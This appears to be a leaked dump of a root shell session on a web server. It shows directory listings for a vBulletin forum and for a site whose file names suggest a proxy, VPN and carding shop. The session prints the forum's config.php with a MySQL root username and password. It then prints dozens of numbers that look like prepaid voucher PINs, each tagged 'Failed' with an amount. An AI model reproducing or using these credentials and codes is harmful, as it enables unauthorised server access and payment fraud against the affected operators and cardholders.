+//if (VB_AREA == 'AdminCP') +//{ +// $config['Misc']['debug'] = 1; +//} + +/*======================================================================*\ +|| #################################################################### +|| # CVS: $RCSfile$ - $Revision: 1035 $ 28757 +|| #################################################################### +\*======================================================================*/ + +// Ja, es ist richtig, dass am Ende dieser Datei kein schliessendes PHP-Tag steht! +// Dadurch wird ein haeufig auftretender Fehler vermieden. + +# cd /var/www/scenecms.org/ && ls -la +total 32 +drwxrwxrwx 4 root root 4096 Oct 1 09:18 . +drwxr-xr-x 9 root root 4096 Dec 28 02:33 .. +drwxr-xr-x 3 root root 4096 Oct 1 09:18 ba +-rw-r--r-- 1 root root 35 Mar 15 2010 index.php +-rw-r--r-- 1 root root 9962 May 10 2010 oldDATA.tgz +drwxrwxrwx 3 root root 4096 Jul 8 2010 web + +# cd web && ls -la +total 12 +drwxrwxrwx 3 root root 4096 Jul 8 2010 . +drwxrwxrwx 4 root root 4096 Oct 1 09:18 .. +drwxr-xr-x 16 root root 4096 Oct 2 15:14 board + +# cd board/ && ls -la +total 2272 +drwxr-xr-x 16 root root 4096 Oct 2 15:14 . +drwxrwxrwx 3 root root 4096 Jul 8 2010 .. 
+-rw-r--r-- 1 root root 17097 Apr 23 2010 LICENSE +drwxr-xr-x 3 root root 4096 Oct 2 15:31 admincp +-rw-r--r-- 1 root root 38048 Apr 23 2010 ajax.php +-rw-r--r-- 1 root root 75538 Apr 23 2010 album.php +-rw-r--r-- 1 root root 19054 Apr 23 2010 announcement.php +drwxr-xr-x 2 root root 4096 Jul 8 2010 archive +-rw-r--r-- 1 root root 8945 Apr 23 2010 asset.php +-rw-r--r-- 1 root root 20246 Apr 23 2010 assetmanage.php +-rw-r--r-- 1 root root 15723 Apr 23 2010 attachment.php +-rw-r--r-- 1 root root 6119 Apr 23 2010 attachment_inlinemod.php +-rw-r--r-- 1 root root 3462 Apr 23 2010 blog_attachment.php +-rw-r--r-- 1 root root 96014 Apr 23 2010 calendar.php +-rw-r--r-- 1 root root 43 Apr 23 2010 clear.gif +drwxr-xr-x 7 root root 4096 Jul 8 2010 clientscript +-rw-r--r-- 1 root root 15283 Apr 23 2010 converse.php +drwxr-xr-x 7 root root 4096 Jul 8 2010 cpstyles +-rw-r--r-- 1 root root 3244 Apr 23 2010 cron.php +-rw-r--r-- 1 root root 4051 Apr 23 2010 css.php +drwxr-xr-x 3 root root 4096 Jul 8 2010 customavatars +drwxr-xr-x 3 root root 4096 Jul 8 2010 customgroupicons +drwxr-xr-x 2 root root 4096 Jul 8 2010 customprofilepics +-rw-r--r-- 1 root root 1660 Apr 23 2010 editor.php +-rw-r--r-- 1 root root 46327 Apr 23 2010 editpost.php +-rw-r--r-- 1 root root 1336 Apr 23 2010 entry.php +-rw-r--r-- 1 root root 29278 Apr 23 2010 external.php +-rw-r--r-- 1 root root 9901 Apr 23 2010 faq.php +-rw-r--r-- 1 root root 10134 Apr 23 2010 favicon.ico +-rw-r--r-- 1 root root 22502 Apr 23 2010 forum.php +-rw-r--r-- 1 root root 42428 Apr 23 2010 forumdisplay.php +-rw-r--r-- 1 root root 2001 Apr 23 2010 global.php +-rw-r--r-- 1 root root 155709 Apr 23 2010 group.php +-rw-r--r-- 1 root root 26085 Apr 23 2010 group_inlinemod.php +-rw-r--r-- 1 root root 11483 Apr 23 2010 groupsubscription.php +-rw-r--r-- 1 root root 8974 Apr 23 2010 image.php +drwxr-xr-x 24 root root 4096 Oct 2 16:42 images +drwxr-xr-x 8 root root 12288 Oct 2 15:27 includes +-rw-r--r-- 1 root root 2335 Apr 23 2010 index.php 
+-rw-r--r-- 1 root root 46944 Apr 23 2010 infraction.php +-rw-r--r-- 1 root root 186868 Apr 23 2010 inlinemod.php +drwxr-xr-x 3 root root 4096 Oct 2 15:09 install +-rw-r--r-- 1 root root 11280 Apr 23 2010 joinrequests.php +-rw-r--r-- 1 root root 1656 Apr 23 2010 list.php +-rw-r--r-- 1 root root 10749 Apr 23 2010 login.php +-rw-r--r-- 1 root root 18893 Apr 23 2010 member.php +-rw-r--r-- 1 root root 16327 Apr 23 2010 member_inlinemod.php +-rw-r--r-- 1 root root 40280 Apr 23 2010 memberlist.php +-rw-r--r-- 1 root root 22247 Apr 23 2010 misc.php +drwxr-xr-x 2 root root 4096 Jul 8 2010 modcp +-rw-r--r-- 1 root root 75687 Apr 23 2010 moderation.php +-rw-r--r-- 1 root root 6714 Apr 23 2010 moderator.php +-rw-r--r-- 1 root root 17286 Apr 23 2010 newattachment.php +-rw-r--r-- 1 root root 38921 Apr 23 2010 newreply.php +-rw-r--r-- 1 root root 19610 Apr 23 2010 newthread.php +-rw-r--r-- 1 root root 21719 Apr 23 2010 online.php +drwxr-xr-x 5 root root 4096 Jul 8 2010 packages +-rw-r--r-- 1 root root 8031 Apr 23 2010 payment_gateway.php +-rw-r--r-- 1 root root 13196 Apr 23 2010 payments.php +-rw-r--r-- 1 root root 3997 Apr 23 2010 picture.php +-rw-r--r-- 1 root root 16600 Apr 23 2010 picture_inlinemod.php +-rw-r--r-- 1 root root 26104 Apr 23 2010 picturecomment.php +-rw-r--r-- 1 root root 29273 Apr 23 2010 poll.php +-rw-r--r-- 1 root root 10349 Apr 23 2010 posthistory.php +-rw-r--r-- 1 root root 76416 Apr 23 2010 postings.php +-rw-r--r-- 1 root root 7022 Apr 23 2010 printthread.php +-rw-r--r-- 1 root root 78993 Apr 23 2010 private.php +-rw-r--r-- 1 root root 160820 Apr 23 2010 profile.php +-rw-r--r-- 1 root root 296 Apr 23 2010 receiver.php +-rw-r--r-- 1 root root 54170 Apr 23 2010 register.php +-rw-r--r-- 1 root root 5742 Apr 23 2010 report.php +-rw-r--r-- 1 root root 14700 Apr 23 2010 reputation.php +-rw-r--r-- 1 root root 34065 Apr 23 2010 search.php +-rw-r--r-- 1 root root 22645 Apr 23 2010 sendmessage.php +-rw-r--r-- 1 root root 12420 Apr 23 2010 showgroups.php +-rw-r--r-- 
1 root root 12673 Apr 23 2010 showpost.php +-rw-r--r-- 1 root root 79415 Apr 23 2010 showthread.php +drwxr-xr-x 2 root root 4096 Jul 8 2010 signaturepics +-rw-r--r-- 1 root root 37650 Apr 23 2010 subscription.php +-rw-r--r-- 1 root root 5334 Apr 23 2010 tags.php +-rw-r--r-- 1 root root 8735 Apr 23 2010 threadrate.php +-rw-r--r-- 1 root root 11081 Apr 23 2010 threadtag.php +-rw-r--r-- 1 root root 61 Apr 23 2010 uploadprogress.gif +-rw-r--r-- 1 root root 39049 Apr 23 2010 usercp.php +-rw-r--r-- 1 root root 20969 Apr 23 2010 usernote.php +drwxr-xr-x 12 root root 4096 Jul 8 2010 vb +-rw-r--r-- 1 root root 27814 Apr 23 2010 visitormessage.php +-rw-r--r-- 1 root root 1660 Apr 23 2010 widget.php +-rw-r--r-- 1 root root 3656 Apr 23 2010 xmlsitemap.php + +# cat includes/config.php +<?php +/*======================================================================*\ +|| #################################################################### || +|| # vBulletin 4.0.3 Patch Level 1 +|| # ---------------------------------------------------------------- # || +|| # All PHP code in this file is ?2000-2010 vBulletin Solutions Inc. # || +|| # This file may not be redistributed in whole or significant part. # || +|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # || +|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # || +|| #################################################################### || +\*======================================================================*/ + +/*-------------------------------------------------------*\ +| ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** | ++---------------------------------------------------------+ +| If you get any errors while attempting to connect to | +| MySQL, you will need to email your webhost because we | +| cannot tell you the correct values for the variables | +| in this file. 
| +\*-------------------------------------------------------*/ + + // ****** DATABASE TYPE ****** + // This is the type of the database server on which your vBulletin database will be located. + // Valid options are mysql and mysqli, for slave support add _slave. Try to use mysqli if you are using PHP 5 and MySQL 4.1+ + // for slave options just append _slave to your preferred database type. +$config['Database']['dbtype'] = 'mysql'; + + // ****** DATABASE NAME ****** + // This is the name of the database where your vBulletin will be located. + // This must be created by your webhost. +$config['Database']['dbname'] = 'forum'; + + // ****** TABLE PREFIX ****** + // Prefix that your vBulletin tables have in the database. +$config['Database']['tableprefix'] = ''; + + // ****** TECHNICAL EMAIL ADDRESS ****** + // If any database errors occur, they will be emailed to the address specified here. + // Leave this blank to not send any emails when there is a database error. +$config['Database']['technicalemail'] = 'admin@scenecms.org'; + + // ****** FORCE EMPTY SQL MODE ****** + // New versions of MySQL (4.1+) have introduced some behaviors that are + // incompatible with vBulletin. Setting this value to "true" disables those + // behaviors. You only need to modify this value if vBulletin recommends it. +$config['Database']['force_sql_mode'] = false; + + + + // ****** MASTER DATABASE SERVER NAME AND PORT ****** + // This is the hostname or IP address and port of the database server. + // If you are unsure of what to put here, leave the default values. +$config['MasterServer']['servername'] = 'localhost'; +$config['MasterServer']['port'] = 3306; + + // ****** MASTER DATABASE USERNAME & PASSWORD ****** + // This is the username and password you use to access MySQL. + // These must be obtained through your webhost. 
+$config['MasterServer']['username'] = 'root'; +$config['MasterServer']['password'] = 'QkZorIZZC5e'; + + // ****** MASTER DATABASE PERSISTENT CONNECTIONS ****** + // This option allows you to turn persistent connections to MySQL on or off. + // The difference in performance is negligible for all but the largest boards. + // If you are unsure what this should be, leave it off. (0 = off; 1 = on) +$config['MasterServer']['usepconnect'] = 0; + + + + // ****** SLAVE DATABASE CONFIGURATION ****** + // If you have multiple database backends, this is the information for your slave + // server. If you are not 100% sure you need to fill in this information, + // do not change any of the values here. +$config['SlaveServer']['servername'] = ''; +$config['SlaveServer']['port'] = 3306; +$config['SlaveServer']['username'] = ''; +$config['SlaveServer']['password'] = ''; +$config['SlaveServer']['usepconnect'] = 0; + + + + // ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ****** + // This setting allows you to change the name of the folders that the admin and + // moderator control panels reside in. You may wish to do this for security purposes. + // Please note that if you change the name of the directory here, you will still need + // to manually change the name of the directory on the server. +$config['Misc']['admincpdir'] = 'admincp'; +$config['Misc']['modcpdir'] = 'modcp'; + + // Prefix that all vBulletin cookies will have + // Keep this short and only use numbers and letters, i.e. 1-9 and a-Z +$config['Misc']['cookieprefix'] = 'bb'; + + // ******** FULL PATH TO FORUMS DIRECTORY ****** + // On a few systems it may be necessary to input the full path to your forums directory + // for vBulletin to function normally. You can ignore this setting unless vBulletin + // tells you to fill this in. Do not include a trailing slash! 
+ // Example Unix: + // $config['Misc']['forumpath'] = '/home/users/public_html/forums'; + // Example Win32: + // $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3'; +$config['Misc']['forumpath'] = '/var/www/scenecms.org/web/board'; + + + + // ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ****** + // The users specified here will be allowed to view the admin log in the control panel. + // Users must be specified by *ID number* here. To obtain a user's ID number, + // view their profile via the control panel. If this is a new installation, leave + // the first user created will have a user ID of 1. Seperate each userid with a comma. +$config['SpecialUsers']['canviewadminlog'] = '1'; + + // ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ****** + // The users specified here will be allowed to remove ("prune") entries from the admin + // log. See the above entry for more information on the format. +$config['SpecialUsers']['canpruneadminlog'] = '1'; + + // ****** USERS WITH QUERY RUNNING PERMISSIONS ****** + // The users specified here will be allowed to run queries from the control panel. + // See the above entries for more information on the format. + // Please note that the ability to run queries is quite powerful. You may wish + // to remove all user IDs from this list for security reasons. +$config['SpecialUsers']['canrunqueries'] = ''; + + // ****** UNDELETABLE / UNALTERABLE USERS ****** + // The users specified here will not be deletable or alterable from the control panel by any users. + // To specify more than one user, separate userids with commas. 
+$config['SpecialUsers']['undeletableusers'] = ''; + + // ****** SUPER ADMINISTRATORS ****** + // The users specified below will have permission to access the administrator permissions + // page, which controls the permissions of other administrators +$config['SpecialUsers']['superadministrators'] = '1'; + + // ****** DATASTORE CACHE CONFIGURATION ***** + // Here you can configure different methods for caching datastore items. + // vB_Datastore_Filecache - to use includes/datastore/datastore_cache.php + // vB_Datastore_APC - to use APC + // vB_Datastore_XCache - to use XCache + // vB_Datastore_Memcached - to use a Memcache server, more configuration below +// $config['Datastore']['class'] = 'vB_Datastore_Filecache'; + + // ******** DATASTORE PREFIX ****** + // If you are using a PHP Caching system (APC, XCache, eAccelerator) with more + // than one set of forums installed on your host, you *may* need to use a prefix + // so that they do not try to use the same variable within the cache. + // This works in a similar manner to the database table prefix. +// $config['Datastore']['prefix'] = ''; + + // It is also necessary to specify the hostname or IP address and the port the server is listening on +/* +$config['Datastore']['class'] = 'vB_Datastore_Memcached'; +$i = 0; +// First Server +$i++; +$config['Misc']['memcacheserver'][$i] = '127.0.0.1'; +$config['Misc']['memcacheport'][$i] = 11211; +$config['Misc']['memcachepersistent'][$i] = true; +$config['Misc']['memcacheweight'][$i] = 1; +$config['Misc']['memcachetimeout'][$i] = 1; +$config['Misc']['memcacheretry_interval'][$i] = 15; +*/ + +// ****** The following options are only needed in special cases ****** + + // ****** MySQLI OPTIONS ***** + // When using MySQL 4.1+, MySQLi should be used to connect to the database. + // If you need to set the default connection charset because your database + // is using a charset other than latin1, you can set the charset here. 
+ // If you don't set the charset to be the same as your database, you + // may receive collation errors. Ignore this setting unless you + // are sure you need to use it. +// $config['Mysqli']['charset'] = 'utf8'; + + // Optionally, PHP can be instructed to set connection parameters by reading from the + // file named in 'ini_file'. Please use a full path to the file. + // Example: + // $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini'; +$config['Mysqli']['ini_file'] = ''; + +// Image Processing Options + // Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings. +$config['Misc']['maxwidth'] = 2592; +$config['Misc']['maxheight'] = 1944; + +/*======================================================================*\ +|| #################################################################### +|| # +|| # CVS: $RCSfile$ - $Revision: 32878 $ +|| #################################################################### +\*======================================================================*/ + +# cd /var/www/vpn24.org/ && ls -la +total 120 +drwxr-xr-x 3 root root 4096 Dec 13 22:18 . +drwxr-xr-x 9 root root 4096 Dec 28 02:33 .. +-rw-r--r-- 1 root root 35 May 9 2010 index.php +-rwxr-xr-x 1 root root 18378 Nov 8 19:00 testVicSocks +drwxr-xr-x 9 www-data root 86016 Jan 8 02:41 web + +# cd web + +# ls -la | grep -v cookie.txt +total 3296 +drwxr-xr-x 9 www-data root 86016 Jan 8 02:41 . +drwxr-xr-x 3 root root 4096 Dec 13 22:18 .. 
+-rw-r--r-- 1 www-data www-data 6413 Dec 11 07:33 21Kms__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Jan 3 18:07 5Liter__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 4 17:35 AtzePeng__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 1 10:29 BloodySunday__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 17 12:39 Delphinko__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 15 18:47 DieFliege__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 28 19:38 DingDong__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 15 13:59 Emrano__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 8 20:14 EsseX__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 6 20:22 Firewall__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Nov 20 11:18 HohesC__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 23 14:28 ICHICH__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 11 17:53 Janitor1__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Nov 27 14:04 KaLLi__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 5 12:17 Keineloe__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 10 17:26 Lognot__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 3 20:11 Maxim__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 1 14:35 MysticSun__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Nov 27 08:53 QuickSilver__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 24 01:01 Selfcut__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Nov 19 20:52 SlamD__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 18 14:05 Sparkasse__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 14 13:19 TheKing__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Jan 1 22:54 Tiberius1__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 23 15:04 WeArEoNe__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 13 
10:02 __splittingError.htm +-rw-r--r-- 1 www-data root 257 Nov 18 20:01 abo.php +-rw-r--r-- 1 root root 5186 Nov 4 20:46 abo_lu.php +-rw-r--r-- 1 root root 5186 Nov 4 20:46 abo_ru.php +-rw-r--r-- 1 www-data root 4508 Nov 18 20:43 account.php +-rw-r--r-- 1 www-data www-data 6412 Nov 14 07:33 analytics__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 18 12:36 andreas7411__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 16 11:40 asdfghjkl__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 9 10:37 b0uNz__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 15 17:38 b14ckf1ag__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 2 02:09 b2323__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 11 13:43 b7233__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 11 19:37 bLackftw1989__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 9 13:49 becks__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 12 15:42 beware__splittingError.htm +-rw-r--r-- 1 www-data root 1209 Jan 26 2010 buy.php +-rw-r--r-- 1 www-data www-data 6412 Dec 6 13:12 c4sh1__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 8 18:10 cardercarder__splittingError.htm +drwxrwxrwx 3 www-data root 36864 Jan 7 18:38 cashIn +-rw-r--r-- 1 www-data root 393 Nov 18 20:29 cashin.php +-rw-r--r-- 1 root root 1291 Nov 18 19:05 check_one_vsocks5123213.php +-rw-r--r-- 1 root root 2219 Nov 12 00:15 checkvsocks.php +-rw-r--r-- 1 www-data www-data 6412 Nov 11 22:01 crack__splittingError.htm +-rw-r--r-- 1 www-data www-data 1063 Dec 27 16:40 dbg.html +-rw-r--r-- 1 www-data www-data 6412 Nov 21 15:48 djdalio__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 10 22:27 docscanner__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 17 14:41 duden__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 1 14:38 dudex__splittingError.htm +-rw-r--r-- 1 www-data www-data 1063 Dec 27 16:11 dump.html +-rw-r--r-- 1 www-data 
www-data 6412 Dec 3 13:45 enosaires__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Nov 30 11:16 epoepo__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 20 19:41 erebos1337__splittingError.htm +-rw-r--r-- 1 www-data root 311 Nov 18 20:21 faq.php +-rw-r--r-- 1 root root 1406 Nov 18 23:11 favicon.ico +-rw-r--r-- 1 www-data www-data 6412 Dec 14 13:24 frankylo__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 14 16:48 fuckdawn__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 24 16:14 hackbart2__splittingError.htm +-rw-r--r-- 1 root root 967 Aug 3 19:00 handleVsocks.php +-rw-r--r-- 1 www-data www-data 6412 Dec 13 00:18 hans2000__splittingError.htm +-rw-r--r-- 1 root root 56 May 11 2010 hdf2.php +-rw-r--r-- 1 www-data root 1064 Jul 17 14:33 header.php +-rw-r--r-- 1 root root 950 Nov 18 21:54 header2.php +-rw-r--r-- 1 www-data www-data 6412 Dec 13 15:32 hexst4tic__splittingError.htm +-rw-r--r-- 1 www-data root 1380 Aug 23 01:44 home.php +-rw-r--r-- 1 root root 178 Nov 15 18:01 home2.php +-rw-r--r-- 1 www-data www-data 6412 Nov 9 20:00 hund123456__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 22 18:04 iKas2__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 7 19:15 iiyama__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 13 10:08 ikarus22__splittingError.htm +drwxr-xr-x 2 www-data root 4096 Nov 4 21:36 images +drwxr-xr-x 2 root root 4096 Nov 18 21:45 images2 +-rw-r--r-- 1 root root 10646 Nov 18 23:16 index.php +-rw-r--r-- 1 root root 4299 Nov 18 21:26 indexORIGINALbss213123123.php +-rw-r--r-- 1 www-data www-data 6411 Nov 16 15:37 jensmaul__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 15 19:51 joeee__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Nov 17 21:01 jojo187__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 15 23:53 jojoman__splittingError.htm +-rw-r--r-- 1 www-data www-data 4853 Nov 23 15:15 juicestin__splittingError.htm +-rw-r--r-- 1 www-data www-data 
6411 Nov 24 20:33 juliasutter__splittingError.htm +-rw-r--r-- 1 www-data www-data 6515 Dec 1 23:49 kackpfosten__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 17 20:07 keystyle__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 8 14:21 kirmi__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 10 18:42 klaudio__splittingError.htm +drwxr-xr-x 2 www-data root 4096 Nov 20 13:42 koksundnuTTen88 +-rw-r--r-- 1 www-data www-data 6411 Dec 14 13:32 kucke17__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 10 05:37 latestnews__splittingError.htm +-rw-r--r-- 1 root root 156 Nov 18 19:10 listallvsocks62342134543.php +-rw-r--r-- 1 www-data root 1421 May 9 2010 listssh.php +-rw-r--r-- 1 www-data root 1781 Nov 18 20:28 listvpn.php +-rw-r--r-- 1 root root 1245 May 15 2010 loadssh.php +-rw-r--r-- 1 www-data www-data 1630 May 6 2010 login.php +-rw-r--r-- 1 root root 7442 Nov 18 20:27 lu_abo.php +-rw-r--r-- 1 root root 1274 Nov 4 21:05 lu_loadssh.php +-rw-r--r-- 1 root root 3126 Nov 18 20:17 lu_socks5.php +-rw-r--r-- 1 www-data www-data 6412 Jan 3 16:19 magi007__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 23 21:56 makko__splittingError.htm +drwxr-xr-x 2 root root 4096 Dec 23 12:15 moneystream +-rw-r--r-- 1 www-data root 182 May 10 2010 mysql.php +-rw-r--r-- 1 root root 3879 Nov 18 20:27 newProxie.php +-rw-r--r-- 1 www-data root 596 Nov 18 20:07 news.php +-rw-r--r-- 1 www-data root 362 May 6 2010 news_overview.php +-rw-r--r-- 1 root root 380 Nov 15 17:58 news_overview2.php +-rw-r--r-- 1 www-data www-data 6412 Nov 18 12:24 nitex__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 14 19:08 offlinejack__splittingError.htm +drwxr-xr-x 2 www-data root 36864 Jan 7 19:58 ovpn +-rw-r--r-- 1 www-data www-data 6412 Dec 7 19:56 pablo__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 10 20:04 pan1c__splittingError.htm +-rw-r--r-- 1 www-data www-data 6512 Dec 7 22:57 pappe223__splittingError.htm +-rw-r--r-- 1 root root 
1326 Aug 24 19:30 poll.php +-rw-r--r-- 1 www-data www-data 6411 Dec 14 14:07 pscBastard__splittingError.htm +-rw-r--r-- 1 root root 256 Sep 13 16:27 pscashin.php +-rw-r--r-- 1 www-data www-data 6409 Jan 7 23:47 pwnny__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 19 19:59 pyrodeath__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 14 16:24 qqqqqq__splittingError.htm +-rw-r--r-- 1 www-data root 2817 Nov 18 22:46 register.php +-rw-r--r-- 1 www-data www-data 6412 Dec 29 17:02 reideen__splittingError.htm +-rw-r--r-- 1 root root 7157 Nov 18 20:26 ru_abo.php +-rw-r--r-- 1 root root 1262 Nov 4 21:05 ru_loadssh.php +-rw-r--r-- 1 root root 3025 Nov 18 20:16 ru_socks5.php +-rw-r--r-- 1 www-data root 1196 Nov 24 17:32 saveReq.php +-rw-r--r-- 1 www-data root 5125 Aug 29 16:29 shop.php +-rw-r--r-- 1 www-data www-data 6412 Dec 10 14:33 shore__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 3 20:35 slic3menic3__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 15 22:18 snowghost__splittingError.htm +-rw-r--r-- 1 www-data root 263 Nov 18 20:16 socks5.php +-rw-r--r-- 1 root root 574 Oct 7 18:54 socksdetails.php +-rw-r--r-- 1 www-data www-data 6412 Nov 9 16:10 spran__splittingError.htm +-rw-r--r-- 1 www-data root 3104 Nov 18 20:20 styles.css +drwxr-xr-x 2 root root 4096 Oct 21 18:25 suPPortPanel18 +-rw-r--r-- 1 www-data www-data 6412 Dec 23 16:07 sunrise__splittingError.htm +-rw-r--r-- 1 www-data root 1336 Nov 18 20:53 support.php +-rw-r--r-- 1 www-data www-data 6412 Jan 2 16:36 test569__splittingError.htm +-rw-r--r-- 1 root root 171 May 12 2010 time.php +-rw-r--r-- 1 www-data www-data 6412 Nov 11 18:38 traden90__splittingError.htm +-rw-r--r-- 1 root root 139 Dec 28 14:21 ukashin.php +-rw-r--r-- 1 root root 2118 Nov 18 20:25 uvsocks.php +-rw-r--r-- 1 www-data www-data 6412 Dec 15 07:03 vpn24__splittingError.htm +-rw-r--r-- 1 www-data root 799 May 6 2010 vsocks.php +-rw-r--r-- 1 www-data www-data 6412 Dec 28 14:25 
w333d__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 14 17:17 winkel72__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 8 12:53 xc0re__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 11 11:52 xxx3xxx4__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 4 16:45 zezol__splittingError.htm + +# cat *splittingError.htm | grep "Failed</td>" +<tr><td>6337180255464896366</td><td>Failed</td><td>100.00</td></tr> +<tr><td>6337180253212809062</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180252076434686</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6337180253299398565</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180257214002899</td><td>Failed</td><td>3.00</td></tr> +<tr><td>6337180259183915580</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180252532009429</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180250390679390</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6330949130319304248</td><td>Failed</td><td>30.00</td></tr> +<tr><td>6337180259379552429</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180258343754368</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180256917976433</td><td>Failed</td><td>2.14</td></tr> +<tr><td>6337180251009203952</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180111553585578</td><td>Failed</td><td>4.00</td></tr> +<tr><td>6337180258177204589</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180253681177082</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180259073857611</td><td>Failed</td><td>3.00</td></tr> +<tr><td>6337180256462965609</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180115155785437</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180394582246475</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180258243666274</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180256212540975</td><td>Failed</td><td>50.00</td></tr> +<tr><td>6337180257735545855</td><td>Failed</td><td>10.00</td></tr> 
+<tr><td>6337180250238018710</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180250936554560</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180258032831998</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180113239640306</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180259568330264</td><td>Failed</td><td>50.00</td></tr> +<tr><td>6337180254636279981</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180255605913872</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180251576728091</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6337180254761736029</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180251140051070</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180258955781559</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180255901612889</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6337180252316842391</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6337180255645832702</td><td>Failed</td><td>50.00</td></tr> +<tr><td>6337180253814896822</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6330302815447899096</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180119686732454</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180253644660265</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180257110264619</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180115155785437</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180254730527152</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180259238856011</td><td>Failed</td><td>5.00</td></tr> 